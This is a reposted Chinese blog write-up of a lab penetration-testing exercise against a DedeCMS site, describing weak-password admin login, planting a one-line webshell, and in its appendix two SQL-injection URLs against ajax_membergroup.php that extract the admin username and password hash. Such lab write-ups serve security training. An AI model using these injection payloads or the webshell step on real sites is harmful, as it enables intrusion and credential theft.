实验吧delecms综合***

最新推荐文章于 2024-07-15 20:31:53 发布

weixin_34126215

最新推荐文章于 2024-07-15 20:31:53 发布

阅读量180

点赞数

CC 4.0 BY-SA版权

文章标签： php

原文链接：http://blog.51cto.com/tdcqvip/1952827

本文分享了一次针对织梦CMS系统的渗透测试过程，包括利用默认后台登录弱口令、添加一句话***并获取管理员权限的方法，以及通过SQL注入爆破管理员账号密码的技术细节。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

环境说明：

名字：网站综合***_dedecms

环境：目标机：192.168.1.3

织梦cms

开始***：

网站首页：

先去后台看看。看看默认后台dede在不在，答案是存在的，如下图

得到key2：

得到了后台，但是不知道密码，但是觉得这种实验环境后台密码应该都是弱口令

于是试了一下账号：admin 密码：admin123 登录成功：登录成功的地方会显示key2，但是一闪即逝，就不截图了。

得到key4：

得到key1：

得到key3：在默认模板里

得到key5：添加一个一句话***，用菜刀连接以后添加一个账户并且提到管理员权限。找到key5，修改为允许权限。得到key5

***结束：得到了5个key，但是key太长了，又没法复制，所以也就没提交。

加油

附录：

后来通过搜索，其实可以通过注入得到管理员账号密码：

爆管理员用户名的语句：

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

得到管理员用户名：admin

爆管理员密码的语句：

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

得到密码：23a7bbd73250516f069d

爆出来的密码是20位，而md5是16位，去掉前边3位和最后1位即可得到16位的md5密文：7bbd73250516f069，直接解密即可

转载于:https://blog.51cto.com/tdcqvip/1952827

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_34126215

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

一次特别的DedeCMS站点渗透

moon fairy's blog

07-23

4915

一系列故事的开端: 这是搜到的一个Dede站点的后台路径为/dede 获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台，并且下意识的打开了文件管理器不过管理员也不是等闲之辈，早已卸载该模块于是，我找到了另一处可以生成PHP文件的地方在”标签源码管理“这里可以创建PHP脚本文件去掉默认的代码,写入eval代码,点击保存，文...

Memcached集成配置Springboot以及xmemcached常规操作

黄嚯嚯

04-09

1614

目录集成前配置引入依赖配置application.yml 自定义properties类自定义Memcached连接配置类 MemcachedClient的使用其他操作集成前配置引入依赖   <depe.

参与评论您还未登录，请先登录后发表或查看评论

某cms网站渗透的过程

MachineGunJoe666

05-06

1298

1.通过fofa查询出该网站的后台，进去发现很像某cms，利用御剑的cms识别工具识别出对方是phpcms的站。 2.通过百度查询得出：该phpcms站点可能存在文件上传，敏感信息泄露，sql报错注入。我只验证出来了sql报错注入。 3.把这几个链接转发到burp的重放器： 1.1： http://xxxxxx.com.cn/index.php?m=wap&c=index&a=init&siteid=1[1] 获取Set-Cookie: aOqWU_siteid用.

实验吧 —— web完整渗透测试实验指导书（图片版）

烟敛寒林的博客

09-02

1368

web完整渗透测试实验指导书（图片版）

九某草 X站cms 渗透篇

黑剑

02-11

5646

这一套源码与网上那些X站cms都是一致，那么在奇安信社区上看到了这款，那么也来玩玩，这一套源码的话基本的都是存在后台提权、存储xss、反射XSS、弱口令（至于弱口令这块一般安装后直接使用admin、admin或者某cms名称直接进行登录，那么我们登录进行也是直接忽略过爆破这一段） 1、爆破篇 ...

判断一个网站使用CMS对渗透测试有什么意义

最新发布

m0_52484587的博客

07-15

191

通过了解目标网站所使用的CMS，渗透测试人员可以针对该CMS的特定漏洞进行深入研究和开发攻击脚本。确定网站使用的CMS有助于收集更准确的目标信息，并为后续测试活动提供更多的线索。常见的CMS包括WordPress、Drupal和Joomla等，它们被广泛用于创建和管理各种类型的网站，从个人博客到企业门户网站都可以使用CMS进行构建和维护。用户权限管理：允许管理员为不同的用户分配不同的权限和角色，控制其对网站内容的访问和编辑权限。模板和主题管理：提供预定义的模板和主题，使用户能够自定义网站的外观和布局。

#学习笔记#WEB攻防与渗透技术（一）web安全概述

cheese0.0的博客

08-05

2334

攻击网络服务器，远程控制机器，例如更换图片 SQL注入的漏洞，可以使用在url后加入语句 and 1=1/and 1=2来判断是否存在漏洞服务器里的用户：两个禁用的，两个搭建网站用户，管理员用户打开sqlmap文件夹，打开cmd命令行。 **攻击语句：**sqlmap.py -u “网页地址” –os-shell 获取系统shell 黑客常用的一些命令： Ne...

渗透测试学习9：CMS渗透

weixin_44315099的博客

03-06

2665

目录概述cms简述robots协议dedecms环境搭建与渗透利用概述 cms简述内容管理系统，也可以理解为模板。 cms管理系统识别：通过某项特征来识别，获得网站某个文件的MD5或者⽤正则表达式与字典里面的关键字进行匹配，如果匹配成功就说明这个站点是对于的CMS。可以用指纹查询来判断目标站点用的什么cms。国内指纹识别：云悉 http://www.yunsee.cn/ 潮汐指纹 http://finger.tidesec.net/ who am i web指纹识别 http://whatweb.

magento后台密码重置，magento忘记后台密码怎么办？

weixin_30920513的博客

07-23

388

1.进入你数据库找到表 admin_user 然后找到管理用户名admin，把password 修改为 0192023a7bbd73250516f069df18b500 ，这个是已经MD5加密过的然后你就可以用用户名：admin 密码：admin123 登陆了。转载于:https://www.cnblogs.com/Ding-Zi/archive/2012/07/13/259...

一些cms渗透的思路

hibari_18的博客

07-12

7773

一些cms渗透的思路

Linux 2.6.10内核下PCI Express Native热插拔框架的实现机制

linglongyouzhi的专栏

07-22

2455

Linux 2.6.10内核下PCI Express Native热插拔框架的实现机制[日期：2008-7-22]来源：IBM 作者：王兵国防科学技术大学计算机学院软件所[字体：大中小] 　 PCI热插拔技术，可以有效避免由更换外设引起的服务器系统停机，对于提高服务器系统可用性和可扩展性意义重大。本文讨论了PCI Express热插

实验吧_网站综合渗透_dedecms

test

10-21

4593

前言某天在交易平台上突然出现了你们公司大量账号以及用户信息的销售信息，老板怀疑公司的服务器被入侵了，需要你对服务器进行渗透测试找出黑客留下的5个标记，通过渗透测试的不同手段获取到隐藏在服务器中的5个key并提交到平台进行得分，答案可以是提交keyn{xxx} 操作服务器：192.168.1.2 目标服务器：192.168.1.3 题目说明在遵守游戏规则的情况下，你需要攻击这个门户网站，通过...

实验吧_网站综合渗透_Discuz!

热门推荐

test

10-21

1万+

前言这个一个实验吧中的环境，分值为50分，下面是题目说明。诶，发现自己很菜。你是国内一流安全公司的“安全专家”，你带领的团队负责维护国内某金融网站的安全，马上临近双十一购物节，客户要求你对重点保障网站进行“授权安全检查”，希望你能找到网站的漏洞。操作机器IP：192.168.1.2 目标机器IP：192.168.1.3 题目说明 1、在不影响客户业务的前提下，你对网站进行了“应用安全...

Java文件操作

霖hero

03-28

545

前言文件是计算机数据处理中常用的数据持久存储形式。Java通过File类支持文件和目录的管理操作，提供了丰富的流对象来实现数据传送和数据读写访问处理。文件与目录操作输入/输出中最常见的是对磁盘文件的访问，Java提供了File类，通过该类的方法可获得文件的信息、目录管理以及进行文件的复制、删除、重命名等管理操作。创建File对象 File类的构造方法有很多形态。（1）File(String path) 中的path指定文件路径及文件名，它可以是绝对路径，也可以是相对路径。绝对路径

Intelli IDEA 快捷键操作，咱来点不一样的

程序员小奎的博客

05-10

1769

前言本文并不打算简单罗列 IntelliJ IDEA 快捷键，而是教你如何通过刻意的练习，来掌握IntelliJ IDEA 快捷键的操作。需要注意的是本文操作均使用Mac进行演示。文中会介绍如何查看 Windows 快捷键。为什么要熟练使用你的开发工具「程序员修炼之道」中有一段关于使用编辑器的内容如下： ❝ 要用好你的编辑器，在你开发时将其操作变成你的本能反应，使编辑器变成你双手的延伸。 ❞ 这样做的好处是：可以大大提高我们的开发效率。而一名优秀的程序员必备的特性之一就是：开发效率高。 ..

实验吧后台登录

keep coding

03-09

7553

http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php先看下源码，发现这个，emmm注入无疑了。咋整。。。没遇到过这种情况啊，想着如何构造' or 1='1之类的,什么情况下md5加密后会形成这玩意呢。。。搞来搞去搞不出。。回过头来看题。。。觉得url里面ffifdyop有点奇怪，这个是啥意思？直接拿去交一发，结果。。。。一时无语。。。还是经验太少。。...

vivado中symthsis（综合）和implementation（执行）具体是为了完成什么操作？

kunkliu的博客

05-13

7906

1.synthesis首先，同学你综合的单次拼错了，综合是synthesis，不是symthsis。综合（synthesis）的概念是：将高级抽象层次的电路描述转化成较低层次的描述。也就是说将语言描述的电路逻辑转化成与门、或门、非门、触发器等基本逻辑单元的互连关系。也就是我们常说的门级网表。以四选一电路为例，综合过程将Verilog代码翻译成了门级互连网表。四选一电路的综合过程综合的概念很重要，利用Verilog 做电路设计时我们总是强调可综合的概念，可综合就是我们的这段代码可以被翻译成门级电路，不可综合就

个6000常用wifi弱口令._黑帽seo神器_Dedecms防黑6个常用操作、安全是良好排名第一步...

weixin_39890332的博客

11-12

170

最近有一些徒弟的网站总是被Hack入侵、被搞寄生虫、导致排名下降、网站降权、网站安全是排名的第一步、最好的防御是防患于未然！下面以Dedecms为例、给大家实战讲讲关于防止入侵的几个姿势！1、不要使用第三方网站dedecms源码、可以从dedecms官网下载程序、匹配模板根据逆冬徒弟们反馈、90%的人被入侵的网站、都是从第三方网站上直接下载了源码使用！之前逆冬也认识一些专门做源码钓鱼的兄弟、你网站...

解决忘记Magento后台管理员密码方法

徐良军的专栏

10-18

2977

<br />【斯鹭】在安装使用Magento有人可能碰到这种情况，忘记了magento后台管理员的密码，没办法登入magento后台，大多数朋友一气之下就重新安装了magento，这样费力又费时。我在这给大家将介绍一个比较好的方法，不必重新安装就可以重新设置你的magento后台管理员密码，这样就避免了不必要的麻烦。<br />密码是经过md5加密的<br />你只需要将你要生成的密码用md5加密工具加密一下，替代phpadmin里面看到的md5加密的密码就可以了。<br />我这里给出详细解决办法：<br